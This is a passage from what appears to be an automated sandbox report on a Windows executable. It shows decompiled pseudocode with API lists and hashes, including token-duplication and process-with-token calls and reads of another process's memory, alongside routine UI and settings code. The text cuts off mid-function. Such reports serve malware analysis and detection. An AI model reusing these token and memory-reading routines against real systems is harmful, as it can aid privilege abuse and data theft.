                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                • API String ID: 2238633743-1970996977
                                                                                                                • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}


























                                                                                                                0x00401ac9
                                                                                                                0x00401ad1
                                                                                                                0x00401ae1
                                                                                                                0x00401ae7
                                                                                                                0x00401ae9
                                                                                                                0x00401aec
                                                                                                                0x00401c1b
                                                                                                                0x00401af2
                                                                                                                0x00401af2
                                                                                                                0x00401af8
                                                                                                                0x00401b0c
                                                                                                                0x00401b1a
                                                                                                                0x00401bfd
                                                                                                                0x00401b20
                                                                                                                0x00401b26
                                                                                                                0x00401b2b
                                                                                                                0x00401b36
                                                                                                                0x00401b40
                                                                                                                0x00401b43
                                                                                                                0x00401b4a
                                                                                                                0x00401b54
                                                                                                                0x00401b55
                                                                                                                0x00401b56
                                                                                                                0x00401b57
                                                                                                                0x00401b58
                                                                                                                0x00401b63
                                                                                                                0x00401b68
                                                                                                                0x00401b69
                                                                                                                0x00401b77
                                                                                                                0x00401b7d
                                                                                                                0x00401b82
                                                                                                                0x00401b82
                                                                                                                0x00401b88
                                                                                                                0x00401b8b
                                                                                                                0x00401b8e
                                                                                                                0x00401b91
                                                                                                                0x00401b98
                                                                                                                0x00401b9b
                                                                                                                0x00401ba0
                                                                                                                0x00401ba5
                                                                                                                0x00401baa
                                                                                                                0x00401bac
                                                                                                                0x00401bac
                                                                                                                0x00401bb2
                                                                                                                0x00401bb2
                                                                                                                0x00401bbe
                                                                                                                0x00401bc4
                                                                                                                0x00401bc6
                                                                                                                0x00401bc8
                                                                                                                0x00401bc8
                                                                                                                0x00401bd7
                                                                                                                0x00401bee
                                                                                                                0x00401bf0
                                                                                                                0x00401bf0
                                                                                                                0x00401c0e
                                                                                                                0x00401c0e
                                                                                                                0x00401c23

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                • memset.MSVCRT ref: 00401B4A
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                  • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                                • String ID: %d %I64x
                                                                                                                • API String ID: 2567117392-2565891505
                                                                                                                • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                                0x004045c2
                                                                                                                0x004045d1
                                                                                                                0x004045da
                                                                                                                0x004045ef
                                                                                                                0x004045f6
                                                                                                                0x00404604
                                                                                                                0x0040460b
                                                                                                                0x00404610
                                                                                                                0x00404616
                                                                                                                0x00404617
                                                                                                                0x00404618
                                                                                                                0x00404628
                                                                                                                0x00404629
                                                                                                                0x0040462a
                                                                                                                0x0040462f
                                                                                                                0x00404630
                                                                                                                0x00404631
                                                                                                                0x0040463c
                                                                                                                0x0040463d
                                                                                                                0x0040463e
                                                                                                                0x00404656
                                                                                                                0x00404662
                                                                                                                0x0040466b
                                                                                                                0x0040466d
                                                                                                                0x0040466e
                                                                                                                0x00404674
                                                                                                                0x00404679

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Delete_snwprintfmemset$Close
                                                                                                                • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                • API String ID: 1018939227-3575174989
                                                                                                                • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                0x0040314a
                                                                                                                0x00403151
                                                                                                                0x00403158
                                                                                                                0x0040315a
                                                                                                                0x00403162
                                                                                                                0x00403166
                                                                                                                0x00403190
                                                                                                                0x00403190
                                                                                                                0x00403198
                                                                                                                0x00403199
                                                                                                                0x0040319e
                                                                                                                0x004031bb
                                                                                                                0x004031a0
                                                                                                                0x004031ad
                                                                                                                0x004031b6
                                                                                                                0x004031b6
                                                                                                                0x0040319e
                                                                                                                0x0040316e
                                                                                                                0x00403176
                                                                                                                0x0040317c
                                                                                                                0x0040317f
                                                                                                                0x0040317f
                                                                                                                0x00403182
                                                                                                                0x0040318a
                                                                                                                0x00000000
                                                                                                                0x0040318c
                                                                                                                0x0040318c
                                                                                                                0x00000000
                                                                                                                0x0040318c

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                0x00404da9
                                                                                                                0x00404dbc
                                                                                                                0x00404dbf
                                                                                                                0x00404dc6
                                                                                                                0x00404dcc
                                                                                                                0x00404dce
                                                                                                                0x00404de1
                                                                                                                0x00404deb
                                                                                                                0x00404df2
                                                                                                                0x00404df4
                                                                                                                0x00404df4
                                                                                                                0x00404e07
                                                                                                                0x00404e0d
                                                                                                                0x00404e18
                                                                                                                0x00404e1c
                                                                                                                0x00404e1e
                                                                                                                0x00404e27
                                                                                                                0x00404e28
                                                                                                                0x00404e29
                                                                                                                0x00404e2f
                                                                                                                0x00404e31
                                                                                                                0x00404e37
                                                                                                                0x00404e41
                                                                                                                0x00404e42
                                                                                                                0x00404e43
                                                                                                                0x00404e46
                                                                                                                0x00404e46
                                                                                                                0x00404e1c
                                                                                                                0x00404e4d
                                                                                                                0x00404e50
                                                                                                                0x00404e5f
                                                                                                                0x00404e66
                                                                                                                0x00404e52
                                                                                                                0x00404e52
                                                                                                                0x00404e52
                                                                                                                0x00404e6d
                                                                                                                0x00404e70
                                                                                                                0x00404e85
                                                                                                                0x00404e85
                                                                                                                0x00000000
                                                                                                                0x00404e72
                                                                                                                0x00404e7b
                                                                                                                0x00404e80
                                                                                                                0x00404e83
                                                                                                                0x00404e87
                                                                                                                0x00404e89
                                                                                                                0x00404e8b
                                                                                                                0x00404e8b
                                                                                                                0x00404ea8
                                                                                                                0x00404ea8
                                                                                                                0x00000000
                                                                                                                0x00404e83

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                • GetWindowRect.USER32 ref: 00404E07
                                                                                                                • GetParent.USER32(?), ref: 00404E12
                                                                                                                • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 2163313125-0
                                                                                                                • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                0x0040639c
                                                                                                                0x004063a4
                                                                                                                0x004063b2
                                                                                                                0x004063c2
                                                                                                                0x004063d3
                                                                                                                0x004063dc
                                                                                                                0x004063eb
                                                                                                                0x004063f0
                                                                                                                0x00406401
                                                                                                                0x00000000
                                                                                                                0x0040641e
                                                                                                                0x0040641f

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                • wcscpy.MSVCRT ref: 004063B2
                                                                                                                • wcscpy.MSVCRT ref: 004063C2
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                  • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 16%
                                                                                                                			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                0x0040adf6
                                                                                                                0x0040adf8
                                                                                                                0x0040adfa
                                                                                                                0x0040adfb
                                                                                                                0x0040adfb
                                                                                                                0x0040ae02
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040ae04
                                                                                                                0x0040ae05
                                                                                                                0x0040ae6d
                                                                                                                0x0040ae6e
                                                                                                                0x0040ae73
                                                                                                                0x0040ae76
                                                                                                                0x0040ae7f
                                                                                                                0x0040ae83
                                                                                                                0x0040ae86
                                                                                                                0x00000000
                                                                                                                0x0040ae86
                                                                                                                0x0040ae8f
                                                                                                                0x0040ae0c
                                                                                                                0x0040ae10
                                                                                                                0x0040ae1e
                                                                                                                0x0040ae3b
                                                                                                                0x0040ae4a
                                                                                                                0x0040ae65
                                                                                                                0x0040ae7a
                                                                                                                0x0040ae7e
                                                                                                                0x0040ae67
                                                                                                                0x0040ae67
                                                                                                                0x0040ae68
                                                                                                                0x00000000
                                                                                                                0x0040ae68
                                                                                                                0x0040ae4c
                                                                                                                0x0040ae4c
                                                                                                                0x0040ae4e
                                                                                                                0x00000000
                                                                                                                0x0040ae4e
                                                                                                                0x0040ae3d
                                                                                                                0x0040ae3d
                                                                                                                0x0040ae3f
                                                                                                                0x0040ae53
                                                                                                                0x0040ae54
                                                                                                                0x0040ae59
                                                                                                                0x0040ae5c
                                                                                                                0x0040ae5c
                                                                                                                0x0040ae20
                                                                                                                0x0040ae28
                                                                                                                0x0040ae2d
                                                                                                                0x0040ae30
                                                                                                                0x0040ae30
                                                                                                                0x0040ae12
                                                                                                                0x0040ae12
                                                                                                                0x0040ae13
                                                                                                                0x00000000
                                                                                                                0x0040ae13
                                                                                                                0x00000000
                                                                                                                0x0040ae10

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
